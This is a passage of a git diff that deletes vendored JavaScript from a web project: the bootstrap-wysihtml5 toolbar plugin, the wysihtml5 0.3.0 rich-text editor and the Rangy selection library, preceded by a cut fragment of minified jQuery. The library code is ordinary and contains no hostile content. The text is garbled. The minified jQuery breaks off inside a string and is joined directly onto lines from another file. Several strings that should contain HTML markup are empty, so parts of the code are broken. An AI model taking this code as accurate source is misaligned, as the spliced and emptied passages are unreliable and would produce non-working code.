a",n=d.getElementsByTagName("*")||[],r=d.getElementsByTagName("a")[0],!r||!r.style||!n.length)return t;s=a.createElement("select"),u=s.appendChild(a.createElement("option")),o=d.getElementsByTagName("input")[0],r.style.cssText="top:1px;float:left;opacity:.5",t.getSetAttribute="t"!==d.className,t.leadingWhitespace=3===d.firstChild.nodeType,t.tbody=!d.getElementsByTagName("tbody").length,t.htmlSerialize=!!d.getElementsByTagName("link").length,t.style=/top/.test(r.getAttribute("style")),t.hrefNormalized="/a"===r.getAttribute("href"),t.opacity=/^0.5/.test(r.style.opacity),t.cssFloat=!!r.style.cssFloat,t.checkOn=!!o.value,t.optSelected=u.selected,t.enctype=!!a.createElement("form").enctype,t.html5Clone="<:nav>"!==a.createElement("nav").cloneNode(!0).outerHTML,t.inlineBlockNeedsLayout=!1,t.shrinkWrapBlocks=!1,t.pixelPosition=!1,t.deleteExpando=!0,t.noCloneEvent=!0,t.reliableMarginRight=!0,t.boxSizingReliable=!0,o.checked=!0,t.noCloneChecked=o.cloneNode(!0).checked,s.disabled=!0,t.optDisabled=!u.disabled;try{delete d.test}catch(h){t.deleteExpando=!1}o=a.createElement("input"),o.setAttribute("value",""),t.input=""===o.getAttribute("value"),o.value="t",o.setAttribute("type","radio"),t.radioValue="t"===o.value,o.setAttribute("checked","t"),o.setAttribute("name","t"),l=a.createDocumentFragment(),l.appendChild(o),t.appendChecked=o.checked,t.checkClone=l.cloneNode(!0).cloneNode(!0).lastChild.checked,d.attachEvent&&(d.attachEvent("onclick",function(){t.noCloneEvent=!1}),d.cloneNode(!0).click());for(f in{submit:!0,change:!0,focusin:!0})d.setAttribute(c="on"+f,"t"),t[f+"Bubbles"]=c in e||d.attributes[c].expando===!1;d.style.backgroundClip="content-box",d.cloneNode(!0).style.backgroundClip="",t.clearCloneStyle="content-box"===d.style.backgroundClip;for(f in x(t))break;return t.ownLast="0"!==f,x(function(){var n,r,o,s="padding:0;margin:0;border:0;display:block;box-sizing:content-box;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;",l=a.getElementsByTagName("body")[0];l&&(n=a.createElement("div"),n.style.cssText="border:0;width:0;height:0;position:absolute;top:0;left:-9999px;margin-top:1px",l.appendChild(n).appendChild(d),d.innerHTML="
";
- }
- };
-
- var templates = function(key, locale, options) {
- return tpl[key](locale, options);
- };
-
-
- var Wysihtml5 = function(el, options) {
- this.el = el;
- var toolbarOpts = options || defaultOptions;
- for(var t in toolbarOpts.customTemplates) {
- tpl[t] = toolbarOpts.customTemplates[t];
- }
- this.toolbar = this.createToolbar(el, toolbarOpts);
- this.editor = this.createEditor(options);
-
- window.editor = this.editor;
-
- $('iframe.wysihtml5-sandbox').each(function(i, el){
- $(el.contentWindow).off('focus.wysihtml5').on({
- 'focus.wysihtml5' : function(){
- $('li.dropdown').removeClass('open');
- }
- });
- });
- };
-
- Wysihtml5.prototype = {
-
- constructor: Wysihtml5,
-
- createEditor: function(options) {
- options = options || {};
-
- // Add the toolbar to a clone of the options object so multiple instances
- // of the WYISYWG don't break because "toolbar" is already defined
- options = $.extend(true, {}, options);
- options.toolbar = this.toolbar[0];
-
- var editor = new wysi.Editor(this.el[0], options);
-
- if(options && options.events) {
- for(var eventName in options.events) {
- editor.on(eventName, options.events[eventName]);
- }
- }
- return editor;
- },
-
- createToolbar: function(el, options) {
- var self = this;
- var toolbar = $("
", {
- 'class' : "wysihtml5-toolbar",
- 'style': "display:none"
- });
- var culture = options.locale || defaultOptions.locale || "en";
- for(var key in defaultOptions) {
- var value = false;
-
- if(options[key] !== undefined) {
- if(options[key] === true) {
- value = true;
- }
- } else {
- value = defaultOptions[key];
- }
-
- if(value === true) {
- toolbar.append(templates(key, locale[culture], options));
-
- if(key === "html") {
- this.initHtml(toolbar);
- }
-
- if(key === "link") {
- this.initInsertLink(toolbar);
- }
-
- if(key === "image") {
- this.initInsertImage(toolbar);
- }
- }
- }
-
- if(options.toolbar) {
- for(key in options.toolbar) {
- toolbar.append(options.toolbar[key]);
- }
- }
-
- toolbar.find("a[data-wysihtml5-command='formatBlock']").click(function(e) {
- var target = e.target || e.srcElement;
- var el = $(target);
- self.toolbar.find('.current-font').text(el.html());
- });
-
- toolbar.find("a[data-wysihtml5-command='foreColor']").click(function(e) {
- var target = e.target || e.srcElement;
- var el = $(target);
- self.toolbar.find('.current-color').text(el.html());
- });
-
- this.el.before(toolbar);
-
- return toolbar;
- },
-
- initHtml: function(toolbar) {
- var changeViewSelector = "a[data-wysihtml5-action='change_view']";
- toolbar.find(changeViewSelector).click(function(e) {
- toolbar.find('a.btn').not(changeViewSelector).toggleClass('disabled');
- });
- },
-
- initInsertImage: function(toolbar) {
- var self = this;
- var insertImageModal = toolbar.find('.bootstrap-wysihtml5-insert-image-modal');
- var urlInput = insertImageModal.find('.bootstrap-wysihtml5-insert-image-url');
- var insertButton = insertImageModal.find('.btn-primary');
- var initialValue = urlInput.val();
- var caretBookmark;
-
- var insertImage = function() {
- var url = urlInput.val();
- urlInput.val(initialValue);
- self.editor.currentView.element.focus();
- if (caretBookmark) {
- self.editor.composer.selection.setBookmark(caretBookmark);
- caretBookmark = null;
- }
- self.editor.composer.commands.exec("insertImage", url);
- };
-
- urlInput.keypress(function(e) {
- if(e.which == 13) {
- insertImage();
- insertImageModal.modal('hide');
- }
- });
-
- insertButton.click(insertImage);
-
- insertImageModal.on('shown', function() {
- urlInput.focus();
- });
-
- insertImageModal.on('hide', function() {
- self.editor.currentView.element.focus();
- });
-
- toolbar.find('a[data-wysihtml5-command=insertImage]').click(function() {
- var activeButton = $(this).hasClass("wysihtml5-command-active");
-
- if (!activeButton) {
- self.editor.currentView.element.focus(false);
- caretBookmark = self.editor.composer.selection.getBookmark();
- insertImageModal.appendTo('body').modal('show');
- insertImageModal.on('click.dismiss.modal', '[data-dismiss="modal"]', function(e) {
- e.stopPropagation();
- });
- return false;
- }
- else {
- return true;
- }
- });
- },
-
- initInsertLink: function(toolbar) {
- var self = this;
- var insertLinkModal = toolbar.find('.bootstrap-wysihtml5-insert-link-modal');
- var urlInput = insertLinkModal.find('.bootstrap-wysihtml5-insert-link-url');
- var targetInput = insertLinkModal.find('.bootstrap-wysihtml5-insert-link-target');
- var insertButton = insertLinkModal.find('.btn-primary');
- var initialValue = urlInput.val();
- var caretBookmark;
-
- var insertLink = function() {
- var url = urlInput.val();
- urlInput.val(initialValue);
- self.editor.currentView.element.focus();
- if (caretBookmark) {
- self.editor.composer.selection.setBookmark(caretBookmark);
- caretBookmark = null;
- }
-
- var newWindow = targetInput.prop("checked");
- self.editor.composer.commands.exec("createLink", {
- 'href' : url,
- 'target' : (newWindow ? '_blank' : '_self'),
- 'rel' : (newWindow ? 'nofollow' : '')
- });
- };
- var pressedEnter = false;
-
- urlInput.keypress(function(e) {
- if(e.which == 13) {
- insertLink();
- insertLinkModal.modal('hide');
- }
- });
-
- insertButton.click(insertLink);
-
- insertLinkModal.on('shown', function() {
- urlInput.focus();
- });
-
- insertLinkModal.on('hide', function() {
- self.editor.currentView.element.focus();
- });
-
- toolbar.find('a[data-wysihtml5-command=createLink]').click(function() {
- var activeButton = $(this).hasClass("wysihtml5-command-active");
-
- if (!activeButton) {
- self.editor.currentView.element.focus(false);
- caretBookmark = self.editor.composer.selection.getBookmark();
- insertLinkModal.appendTo('body').modal('show');
- insertLinkModal.on('click.dismiss.modal', '[data-dismiss="modal"]', function(e) {
- e.stopPropagation();
- });
- return false;
- }
- else {
- return true;
- }
- });
- }
- };
-
- // these define our public api
- var methods = {
- resetDefaults: function() {
- $.fn.wysihtml5.defaultOptions = $.extend(true, {}, $.fn.wysihtml5.defaultOptionsCache);
- },
- bypassDefaults: function(options) {
- return this.each(function () {
- var $this = $(this);
- $this.data('wysihtml5', new Wysihtml5($this, options));
- });
- },
- shallowExtend: function (options) {
- var settings = $.extend({}, $.fn.wysihtml5.defaultOptions, options || {}, $(this).data());
- var that = this;
- return methods.bypassDefaults.apply(that, [settings]);
- },
- deepExtend: function(options) {
- var settings = $.extend(true, {}, $.fn.wysihtml5.defaultOptions, options || {});
- var that = this;
- return methods.bypassDefaults.apply(that, [settings]);
- },
- init: function(options) {
- var that = this;
- return methods.shallowExtend.apply(that, [options]);
- }
- };
-
- $.fn.wysihtml5 = function ( method ) {
- if ( methods[method] ) {
- return methods[method].apply( this, Array.prototype.slice.call( arguments, 1 ));
- } else if ( typeof method === 'object' || ! method ) {
- return methods.init.apply( this, arguments );
- } else {
- $.error( 'Method ' + method + ' does not exist on jQuery.wysihtml5' );
- }
- };
-
- $.fn.wysihtml5.Constructor = Wysihtml5;
-
- var defaultOptions = $.fn.wysihtml5.defaultOptions = {
- "font-styles": true,
- "color": false,
- "emphasis": true,
- "lists": true,
- "html": false,
- "link": true,
- "image": true,
- "size": 'sm',
- events: {},
- parserRules: {
- classes: {
- // (path_to_project/lib/css/bootstrap3-wysiwyg5-color.css)
- "wysiwyg-color-silver" : 1,
- "wysiwyg-color-gray" : 1,
- "wysiwyg-color-white" : 1,
- "wysiwyg-color-maroon" : 1,
- "wysiwyg-color-red" : 1,
- "wysiwyg-color-purple" : 1,
- "wysiwyg-color-fuchsia" : 1,
- "wysiwyg-color-green" : 1,
- "wysiwyg-color-lime" : 1,
- "wysiwyg-color-olive" : 1,
- "wysiwyg-color-yellow" : 1,
- "wysiwyg-color-navy" : 1,
- "wysiwyg-color-blue" : 1,
- "wysiwyg-color-teal" : 1,
- "wysiwyg-color-aqua" : 1,
- "wysiwyg-color-orange" : 1
- },
- tags: {
- "b": {},
- "i": {},
- "br": {},
- "ol": {},
- "ul": {},
- "li": {},
- "h1": {},
- "h2": {},
- "h3": {},
- "h4": {},
- "h5": {},
- "h6": {},
- "blockquote": {},
- "u": 1,
- "img": {
- "check_attributes": {
- "width": "numbers",
- "alt": "alt",
- "src": "url",
- "height": "numbers"
- }
- },
- "a": {
- check_attributes: {
- 'href': "url", // important to avoid XSS
- 'target': 'alt',
- 'rel': 'alt'
- }
- },
- "span": 1,
- "div": 1,
- // to allow save and edit files with code tag hacks
- "code": 1,
- "pre": 1
- }
- },
- stylesheets: ["./assets/plugins/bootstrap-wysihtml5/css/bootstrap3-wysiwyg5-color.css"], // (path_to_project/lib/css/bootstrap3-wysiwyg5-color.css)
- locale: "en"
- };
-
- if (typeof $.fn.wysihtml5.defaultOptionsCache === 'undefined') {
- $.fn.wysihtml5.defaultOptionsCache = $.extend(true, {}, $.fn.wysihtml5.defaultOptions);
- }
-
- var locale = $.fn.wysihtml5.locale = {
- en: {
- font_styles: {
- normal: "Normal text",
- h1: "Heading 1",
- h2: "Heading 2",
- h3: "Heading 3",
- h4: "Heading 4",
- h5: "Heading 5",
- h6: "Heading 6"
- },
- emphasis: {
- bold: "Bold",
- italic: "Italic",
- underline: "Underline"
- },
- lists: {
- unordered: "Unordered list",
- ordered: "Ordered list",
- outdent: "Outdent",
- indent: "Indent"
- },
- link: {
- insert: "Insert link",
- cancel: "Cancel",
- target: "Open link in new window"
- },
- image: {
- insert: "Insert image",
- cancel: "Cancel"
- },
- html: {
- edit: "Edit HTML"
- },
- colours: {
- black: "Black",
- silver: "Silver",
- gray: "Grey",
- maroon: "Maroon",
- red: "Red",
- purple: "Purple",
- green: "Green",
- olive: "Olive",
- navy: "Navy",
- blue: "Blue",
- orange: "Orange"
- }
- }
- };
-
-}(window.jQuery, window.wysihtml5);
\ No newline at end of file
diff --git a/newDesign/assets/plugins/bootstrap-wysihtml5/js/wysihtml5-0.3.0.js b/newDesign/assets/plugins/bootstrap-wysihtml5/js/wysihtml5-0.3.0.js
deleted file mode 100644
index 7afa8f781..000000000
--- a/newDesign/assets/plugins/bootstrap-wysihtml5/js/wysihtml5-0.3.0.js
+++ /dev/null
@@ -1,9523 +0,0 @@
-/**
- * @license wysihtml5 v0.3.0
- * https://github.com/xing/wysihtml5
- *
- * Author: Christopher Blum (https://github.com/tiff)
- *
- * Copyright (C) 2012 XING AG
- * Licensed under the MIT license (MIT)
- *
- */
-var wysihtml5 = {
- version: "0.3.0",
-
- // namespaces
- commands: {},
- dom: {},
- quirks: {},
- toolbar: {},
- lang: {},
- selection: {},
- views: {},
-
- INVISIBLE_SPACE: "\uFEFF",
-
- EMPTY_FUNCTION: function() {},
-
- ELEMENT_NODE: 1,
- TEXT_NODE: 3,
-
- BACKSPACE_KEY: 8,
- ENTER_KEY: 13,
- ESCAPE_KEY: 27,
- SPACE_KEY: 32,
- DELETE_KEY: 46
-};/**
- * @license Rangy, a cross-browser JavaScript range and selection library
- * http://code.google.com/p/rangy/
- *
- * Copyright 2011, Tim Down
- * Licensed under the MIT license.
- * Version: 1.2.2
- * Build date: 13 November 2011
- */
-window['rangy'] = (function() {
-
-
- var OBJECT = "object", FUNCTION = "function", UNDEFINED = "undefined";
-
- var domRangeProperties = ["startContainer", "startOffset", "endContainer", "endOffset", "collapsed",
- "commonAncestorContainer", "START_TO_START", "START_TO_END", "END_TO_START", "END_TO_END"];
-
- var domRangeMethods = ["setStart", "setStartBefore", "setStartAfter", "setEnd", "setEndBefore",
- "setEndAfter", "collapse", "selectNode", "selectNodeContents", "compareBoundaryPoints", "deleteContents",
- "extractContents", "cloneContents", "insertNode", "surroundContents", "cloneRange", "toString", "detach"];
-
- var textRangeProperties = ["boundingHeight", "boundingLeft", "boundingTop", "boundingWidth", "htmlText", "text"];
-
- // Subset of TextRange's full set of methods that we're interested in
- var textRangeMethods = ["collapse", "compareEndPoints", "duplicate", "getBookmark", "moveToBookmark",
- "moveToElementText", "parentElement", "pasteHTML", "select", "setEndPoint", "getBoundingClientRect"];
-
- /*----------------------------------------------------------------------------------------------------------------*/
-
- // Trio of functions taken from Peter Michaux's article:
- // http://peter.michaux.ca/articles/feature-detection-state-of-the-art-browser-scripting
- function isHostMethod(o, p) {
- var t = typeof o[p];
- return t == FUNCTION || (!!(t == OBJECT && o[p])) || t == "unknown";
- }
-
- function isHostObject(o, p) {
- return !!(typeof o[p] == OBJECT && o[p]);
- }
-
- function isHostProperty(o, p) {
- return typeof o[p] != UNDEFINED;
- }
-
- // Creates a convenience function to save verbose repeated calls to tests functions
- function createMultiplePropertyTest(testFunc) {
- return function(o, props) {
- var i = props.length;
- while (i--) {
- if (!testFunc(o, props[i])) {
- return false;
- }
- }
- return true;
- };
- }
-
- // Next trio of functions are a convenience to save verbose repeated calls to previous two functions
- var areHostMethods = createMultiplePropertyTest(isHostMethod);
- var areHostObjects = createMultiplePropertyTest(isHostObject);
- var areHostProperties = createMultiplePropertyTest(isHostProperty);
-
- function isTextRange(range) {
- return range && areHostMethods(range, textRangeMethods) && areHostProperties(range, textRangeProperties);
- }
-
- var api = {
- version: "1.2.2",
- initialized: false,
- supported: true,
-
- util: {
- isHostMethod: isHostMethod,
- isHostObject: isHostObject,
- isHostProperty: isHostProperty,
- areHostMethods: areHostMethods,
- areHostObjects: areHostObjects,
- areHostProperties: areHostProperties,
- isTextRange: isTextRange
- },
-
- features: {},
-
- modules: {},
- config: {
- alertOnWarn: false,
- preferTextRange: false
- }
- };
-
- function fail(reason) {
- window.alert("Rangy not supported in your browser. Reason: " + reason);
- api.initialized = true;
- api.supported = false;
- }
-
- api.fail = fail;
-
- function warn(msg) {
- var warningMessage = "Rangy warning: " + msg;
- if (api.config.alertOnWarn) {
- window.alert(warningMessage);
- } else if (typeof window.console != UNDEFINED && typeof window.console.log != UNDEFINED) {
- window.console.log(warningMessage);
- }
- }
-
- api.warn = warn;
-
- if ({}.hasOwnProperty) {
- api.util.extend = function(o, props) {
- for (var i in props) {
- if (props.hasOwnProperty(i)) {
- o[i] = props[i];
- }
- }
- };
- } else {
- fail("hasOwnProperty not supported");
- }
-
- var initListeners = [];
- var moduleInitializers = [];
-
- // Initialization
- function init() {
- if (api.initialized) {
- return;
- }
- var testRange;
- var implementsDomRange = false, implementsTextRange = false;
-
- // First, perform basic feature tests
-
- if (isHostMethod(document, "createRange")) {
- testRange = document.createRange();
- if (areHostMethods(testRange, domRangeMethods) && areHostProperties(testRange, domRangeProperties)) {
- implementsDomRange = true;
- }
- testRange.detach();
- }
-
- var body = isHostObject(document, "body") ? document.body : document.getElementsByTagName("body")[0];
-
- if (body && isHostMethod(body, "createTextRange")) {
- testRange = body.createTextRange();
- if (isTextRange(testRange)) {
- implementsTextRange = true;
- }
- }
-
- if (!implementsDomRange && !implementsTextRange) {
- fail("Neither Range nor TextRange are implemented");
- }
-
- api.initialized = true;
- api.features = {
- implementsDomRange: implementsDomRange,
- implementsTextRange: implementsTextRange
- };
-
- // Initialize modules and call init listeners
- var allListeners = moduleInitializers.concat(initListeners);
- for (var i = 0, len = allListeners.length; i < len; ++i) {
- try {
- allListeners[i](api);
- } catch (ex) {
- if (isHostObject(window, "console") && isHostMethod(window.console, "log")) {
- window.console.log("Init listener threw an exception. Continuing.", ex);
- }
-
- }
- }
- }
-
- // Allow external scripts to initialize this library in case it's loaded after the document has loaded
- api.init = init;
-
- // Execute listener immediately if already initialized
- api.addInitListener = function(listener) {
- if (api.initialized) {
- listener(api);
- } else {
- initListeners.push(listener);
- }
- };
-
- var createMissingNativeApiListeners = [];
-
- api.addCreateMissingNativeApiListener = function(listener) {
- createMissingNativeApiListeners.push(listener);
- };
-
- function createMissingNativeApi(win) {
- win = win || window;
- init();
-
- // Notify listeners
- for (var i = 0, len = createMissingNativeApiListeners.length; i < len; ++i) {
- createMissingNativeApiListeners[i](win);
- }
- }
-
- api.createMissingNativeApi = createMissingNativeApi;
-
- /**
- * @constructor
- */
- function Module(name) {
- this.name = name;
- this.initialized = false;
- this.supported = false;
- }
-
- Module.prototype.fail = function(reason) {
- this.initialized = true;
- this.supported = false;
-
- throw new Error("Module '" + this.name + "' failed to load: " + reason);
- };
-
- Module.prototype.warn = function(msg) {
- api.warn("Module " + this.name + ": " + msg);
- };
-
- Module.prototype.createError = function(msg) {
- return new Error("Error in Rangy " + this.name + " module: " + msg);
- };
-
- api.createModule = function(name, initFunc) {
- var module = new Module(name);
- api.modules[name] = module;
-
- moduleInitializers.push(function(api) {
- initFunc(api, module);
- module.initialized = true;
- module.supported = true;
- });
- };
-
- api.requireModules = function(modules) {
- for (var i = 0, len = modules.length, module, moduleName; i < len; ++i) {
- moduleName = modules[i];
- module = api.modules[moduleName];
- if (!module || !(module instanceof Module)) {
- throw new Error("Module '" + moduleName + "' not found");
- }
- if (!module.supported) {
- throw new Error("Module '" + moduleName + "' not supported");
- }
- }
- };
-
- /*----------------------------------------------------------------------------------------------------------------*/
-
- // Wait for document to load before running tests
-
- var docReady = false;
-
- var loadHandler = function(e) {
-
- if (!docReady) {
- docReady = true;
- if (!api.initialized) {
- init();
- }
- }
- };
-
- // Test whether we have window and document objects that we will need
- if (typeof window == UNDEFINED) {
- fail("No window found");
- return;
- }
- if (typeof document == UNDEFINED) {
- fail("No document found");
- return;
- }
-
- if (isHostMethod(document, "addEventListener")) {
- document.addEventListener("DOMContentLoaded", loadHandler, false);
- }
-
- // Add a fallback in case the DOMContentLoaded event isn't supported
- if (isHostMethod(window, "addEventListener")) {
- window.addEventListener("load", loadHandler, false);
- } else if (isHostMethod(window, "attachEvent")) {
- window.attachEvent("onload", loadHandler);
- } else {
- fail("Window does not have required addEventListener or attachEvent method");
- }
-
- return api;
-})();
-rangy.createModule("DomUtil", function(api, module) {
-
- var UNDEF = "undefined";
- var util = api.util;
-
- // Perform feature tests
- if (!util.areHostMethods(document, ["createDocumentFragment", "createElement", "createTextNode"])) {
- module.fail("document missing a Node creation method");
- }
-
- if (!util.isHostMethod(document, "getElementsByTagName")) {
- module.fail("document missing getElementsByTagName method");
- }
-
- var el = document.createElement("div");
- if (!util.areHostMethods(el, ["insertBefore", "appendChild", "cloneNode"] ||
- !util.areHostObjects(el, ["previousSibling", "nextSibling", "childNodes", "parentNode"]))) {
- module.fail("Incomplete Element implementation");
- }
-
- // innerHTML is required for Range's createContextualFragment method
- if (!util.isHostProperty(el, "innerHTML")) {
- module.fail("Element is missing innerHTML property");
- }
-
- var textNode = document.createTextNode("test");
- if (!util.areHostMethods(textNode, ["splitText", "deleteData", "insertData", "appendData", "cloneNode"] ||
- !util.areHostObjects(el, ["previousSibling", "nextSibling", "childNodes", "parentNode"]) ||
- !util.areHostProperties(textNode, ["data"]))) {
- module.fail("Incomplete Text Node implementation");
- }
-
- /*----------------------------------------------------------------------------------------------------------------*/
-
- // Removed use of indexOf because of a bizarre bug in Opera that is thrown in one of the Acid3 tests. I haven't been
- // able to replicate it outside of the test. The bug is that indexOf returns -1 when called on an Array that
- // contains just the document as a single element and the value searched for is the document.
- var arrayContains = /*Array.prototype.indexOf ?
- function(arr, val) {
- return arr.indexOf(val) > -1;
- }:*/
-
- function(arr, val) {
- var i = arr.length;
- while (i--) {
- if (arr[i] === val) {
- return true;
- }
- }
- return false;
- };
-
- // Opera 11 puts HTML elements in the null namespace, it seems, and IE 7 has undefined namespaceURI
- function isHtmlNamespace(node) {
- var ns;
- return typeof node.namespaceURI == UNDEF || ((ns = node.namespaceURI) === null || ns == "http://www.w3.org/1999/xhtml");
- }
-
- function parentElement(node) {
- var parent = node.parentNode;
- return (parent.nodeType == 1) ? parent : null;
- }
-
- function getNodeIndex(node) {
- var i = 0;
- while( (node = node.previousSibling) ) {
- i++;
- }
- return i;
- }
-
- function getNodeLength(node) {
- var childNodes;
- return isCharacterDataNode(node) ? node.length : ((childNodes = node.childNodes) ? childNodes.length : 0);
- }
-
- function getCommonAncestor(node1, node2) {
- var ancestors = [], n;
- for (n = node1; n; n = n.parentNode) {
- ancestors.push(n);
- }
-
- for (n = node2; n; n = n.parentNode) {
- if (arrayContains(ancestors, n)) {
- return n;
- }
- }
-
- return null;
- }
-
- function isAncestorOf(ancestor, descendant, selfIsAncestor) {
- var n = selfIsAncestor ? descendant : descendant.parentNode;
- while (n) {
- if (n === ancestor) {
- return true;
- } else {
- n = n.parentNode;
- }
- }
- return false;
- }
-
- function getClosestAncestorIn(node, ancestor, selfIsAncestor) {
- var p, n = selfIsAncestor ? node : node.parentNode;
- while (n) {
- p = n.parentNode;
- if (p === ancestor) {
- return n;
- }
- n = p;
- }
- return null;
- }
-
- function isCharacterDataNode(node) {
- var t = node.nodeType;
- return t == 3 || t == 4 || t == 8 ; // Text, CDataSection or Comment
- }
-
- function insertAfter(node, precedingNode) {
- var nextNode = precedingNode.nextSibling, parent = precedingNode.parentNode;
- if (nextNode) {
- parent.insertBefore(node, nextNode);
- } else {
- parent.appendChild(node);
- }
- return node;
- }
-
- // Note that we cannot use splitText() because it is bugridden in IE 9.
- function splitDataNode(node, index) {
- var newNode = node.cloneNode(false);
- newNode.deleteData(0, index);
- node.deleteData(index, node.length - index);
- insertAfter(newNode, node);
- return newNode;
- }
-
- function getDocument(node) {
- if (node.nodeType == 9) {
- return node;
- } else if (typeof node.ownerDocument != UNDEF) {
- return node.ownerDocument;
- } else if (typeof node.document != UNDEF) {
- return node.document;
- } else if (node.parentNode) {
- return getDocument(node.parentNode);
- } else {
- throw new Error("getDocument: no document found for node");
- }
- }
-
- function getWindow(node) {
- var doc = getDocument(node);
- if (typeof doc.defaultView != UNDEF) {
- return doc.defaultView;
- } else if (typeof doc.parentWindow != UNDEF) {
- return doc.parentWindow;
- } else {
- throw new Error("Cannot get a window object for node");
- }
- }
-
- function getIframeDocument(iframeEl) {
- if (typeof iframeEl.contentDocument != UNDEF) {
- return iframeEl.contentDocument;
- } else if (typeof iframeEl.contentWindow != UNDEF) {
- return iframeEl.contentWindow.document;
- } else {
- throw new Error("getIframeWindow: No Document object found for iframe element");
- }
- }
-
- function getIframeWindow(iframeEl) {
- if (typeof iframeEl.contentWindow != UNDEF) {
- return iframeEl.contentWindow;
- } else if (typeof iframeEl.contentDocument != UNDEF) {
- return iframeEl.contentDocument.defaultView;
- } else {
- throw new Error("getIframeWindow: No Window object found for iframe element");
- }
- }
-
- function getBody(doc) {
- return util.isHostObject(doc, "body") ? doc.body : doc.getElementsByTagName("body")[0];
- }
-
- function getRootContainer(node) {
- var parent;
- while ( (parent = node.parentNode) ) {
- node = parent;
- }
- return node;
- }
-
- function comparePoints(nodeA, offsetA, nodeB, offsetB) {
- // See http://www.w3.org/TR/DOM-Level-2-Traversal-Range/ranges.html#Level-2-Range-Comparing
- var nodeC, root, childA, childB, n;
- if (nodeA == nodeB) {
-
- // Case 1: nodes are the same
- return offsetA === offsetB ? 0 : (offsetA < offsetB) ? -1 : 1;
- } else if ( (nodeC = getClosestAncestorIn(nodeB, nodeA, true)) ) {
-
- // Case 2: node C (container B or an ancestor) is a child node of A
- return offsetA <= getNodeIndex(nodeC) ? -1 : 1;
- } else if ( (nodeC = getClosestAncestorIn(nodeA, nodeB, true)) ) {
-
- // Case 3: node C (container A or an ancestor) is a child node of B
- return getNodeIndex(nodeC) < offsetB ? -1 : 1;
- } else {
-
- // Case 4: containers are siblings or descendants of siblings
- root = getCommonAncestor(nodeA, nodeB);
- childA = (nodeA === root) ? root : getClosestAncestorIn(nodeA, root, true);
- childB = (nodeB === root) ? root : getClosestAncestorIn(nodeB, root, true);
-
- if (childA === childB) {
- // This shouldn't be possible
-
- throw new Error("comparePoints got to case 4 and childA and childB are the same!");
- } else {
- n = root.firstChild;
- while (n) {
- if (n === childA) {
- return -1;
- } else if (n === childB) {
- return 1;
- }
- n = n.nextSibling;
- }
- throw new Error("Should not be here!");
- }
- }
- }
-
- function fragmentFromNodeChildren(node) {
- var fragment = getDocument(node).createDocumentFragment(), child;
- while ( (child = node.firstChild) ) {
- fragment.appendChild(child);
- }
- return fragment;
- }
-
- function inspectNode(node) {
- if (!node) {
- return "[No node]";
- }
- if (isCharacterDataNode(node)) {
- return '"' + node.data + '"';
- } else if (node.nodeType == 1) {
- var idAttr = node.id ? ' id="' + node.id + '"' : "";
- return "<" + node.nodeName + idAttr + ">[" + node.childNodes.length + "]";
- } else {
- return node.nodeName;
- }
- }
-
- /**
- * @constructor
- */
- function NodeIterator(root) {
- this.root = root;
- this._next = root;
- }
-
- NodeIterator.prototype = {
- _current: null,
-
- hasNext: function() {
- return !!this._next;
- },
-
- next: function() {
- var n = this._current = this._next;
- var child, next;
- if (this._current) {
- child = n.firstChild;
- if (child) {
- this._next = child;
- } else {
- next = null;
- while ((n !== this.root) && !(next = n.nextSibling)) {
- n = n.parentNode;
- }
- this._next = next;
- }
- }
- return this._current;
- },
-
- detach: function() {
- this._current = this._next = this.root = null;
- }
- };
-
- function createIterator(root) {
- return new NodeIterator(root);
- }
-
- /**
- * @constructor
- */
- function DomPosition(node, offset) {
- this.node = node;
- this.offset = offset;
- }
-
- DomPosition.prototype = {
- equals: function(pos) {
- return this.node === pos.node & this.offset == pos.offset;
- },
-
- inspect: function() {
- return "[DomPosition(" + inspectNode(this.node) + ":" + this.offset + ")]";
- }
- };
-
- /**
- * @constructor
- */
- function DOMException(codeName) {
- this.code = this[codeName];
- this.codeName = codeName;
- this.message = "DOMException: " + this.codeName;
- }
-
- DOMException.prototype = {
- INDEX_SIZE_ERR: 1,
- HIERARCHY_REQUEST_ERR: 3,
- WRONG_DOCUMENT_ERR: 4,
- NO_MODIFICATION_ALLOWED_ERR: 7,
- NOT_FOUND_ERR: 8,
- NOT_SUPPORTED_ERR: 9,
- INVALID_STATE_ERR: 11
- };
-
- DOMException.prototype.toString = function() {
- return this.message;
- };
-
- api.dom = {
- arrayContains: arrayContains,
- isHtmlNamespace: isHtmlNamespace,
- parentElement: parentElement,
- getNodeIndex: getNodeIndex,
- getNodeLength: getNodeLength,
- getCommonAncestor: getCommonAncestor,
- isAncestorOf: isAncestorOf,
- getClosestAncestorIn: getClosestAncestorIn,
- isCharacterDataNode: isCharacterDataNode,
- insertAfter: insertAfter,
- splitDataNode: splitDataNode,
- getDocument: getDocument,
- getWindow: getWindow,
- getIframeWindow: getIframeWindow,
- getIframeDocument: getIframeDocument,
- getBody: getBody,
- getRootContainer: getRootContainer,
- comparePoints: comparePoints,
- inspectNode: inspectNode,
- fragmentFromNodeChildren: fragmentFromNodeChildren,
- createIterator: createIterator,
- DomPosition: DomPosition
- };
-
- api.DOMException = DOMException;
-});rangy.createModule("DomRange", function(api, module) {
- api.requireModules( ["DomUtil"] );
-
-
- var dom = api.dom;
- var DomPosition = dom.DomPosition;
- var DOMException = api.DOMException;
-
- /*----------------------------------------------------------------------------------------------------------------*/
-
- // Utility functions
-
- function isNonTextPartiallySelected(node, range) {
- return (node.nodeType != 3) &&
- (dom.isAncestorOf(node, range.startContainer, true) || dom.isAncestorOf(node, range.endContainer, true));
- }
-
- function getRangeDocument(range) {
- return dom.getDocument(range.startContainer);
- }
-
- function dispatchEvent(range, type, args) {
- var listeners = range._listeners[type];
- if (listeners) {
- for (var i = 0, len = listeners.length; i < len; ++i) {
- listeners[i].call(range, {target: range, args: args});
- }
- }
- }
-
- function getBoundaryBeforeNode(node) {
- return new DomPosition(node.parentNode, dom.getNodeIndex(node));
- }
-
- function getBoundaryAfterNode(node) {
- return new DomPosition(node.parentNode, dom.getNodeIndex(node) + 1);
- }
-
- function insertNodeAtPosition(node, n, o) {
- var firstNodeInserted = node.nodeType == 11 ? node.firstChild : node;
- if (dom.isCharacterDataNode(n)) {
- if (o == n.length) {
- dom.insertAfter(node, n);
- } else {
- n.parentNode.insertBefore(node, o == 0 ? n : dom.splitDataNode(n, o));
- }
- } else if (o >= n.childNodes.length) {
- n.appendChild(node);
- } else {
- n.insertBefore(node, n.childNodes[o]);
- }
- return firstNodeInserted;
- }
-
- function cloneSubtree(iterator) {
- var partiallySelected;
- for (var node, frag = getRangeDocument(iterator.range).createDocumentFragment(), subIterator; node = iterator.next(); ) {
- partiallySelected = iterator.isPartiallySelectedSubtree();
-
- node = node.cloneNode(!partiallySelected);
